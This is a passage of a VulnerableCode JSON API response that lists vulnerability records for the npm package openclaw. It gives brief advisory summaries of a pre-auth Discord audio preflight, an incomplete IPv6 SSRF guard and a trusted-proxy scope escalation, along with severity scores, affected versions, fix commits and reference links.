"VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-v3qc-wrwx-j3pw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-atn7-pn13-3fgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89019?format=api", "vulnerability_id": "VCID-axp9-mt9z-gkgw", "summary": "OpenClaw runs Discord audio preflight transcription before member authorization\n## Summary\nDiscord audio preflight transcription before member authorization\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41374", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.24049", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.23978", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.24032", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41374" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41374", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41374" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization" }, { "reference_url": "https://github.com/advisories/GHSA-hhff-fj5f-qg48", "reference_id": "GHSA-hhff-fj5f-qg48", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hhff-fj5f-qg48" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41374", "GHSA-hhff-fj5f-qg48" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-axp9-mt9z-gkgw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91346?format=api", "vulnerability_id": "VCID-aye6-1fwu-nkc5", "summary": "OpenClaw SSRF guard misses four IPv6 special-use ranges\n## Summary\n\nThe SSRF/IP classifier treated several IPv6 special-use ranges as public and allowed fetches to proceed.\n\n## Impact\n\nAn attacker who controlled a fetched URL could target internal or non-routable IPv6 addresses that should have been blocked by the SSRF guard.\n\n## Affected Component\n\n`src/shared/net/ip.ts, src/infra/net/ssrf.*`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d61f8e5672` (`Net: block missing IPv6 special-use ranges`).\n\nOpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d61f8e56723e03573b847422468d99c44c26e34f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g86v-f9qv-rh6m" }, { "reference_url": "https://github.com/advisories/GHSA-g86v-f9qv-rh6m", "reference_id": "GHSA-g86v-f9qv-rh6m", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g86v-f9qv-rh6m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-g86v-f9qv-rh6m" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aye6-1fwu-nkc5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89033?format=api", "vulnerability_id": "VCID-b9w3-w2nq-cqg6", "summary": "OpenClaw: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n## Summary\nIncomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n\n## Current Maintainer Triage\n- Normalized severity: high\n- Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8b88b927cb0747ad24d95b07d35682bf85dc5b0e` — 2026-03-30T14:19:00+01:00\n\nOpenClaw thanks @north-echo for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41404", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29702", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29632", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29665", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41404" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", 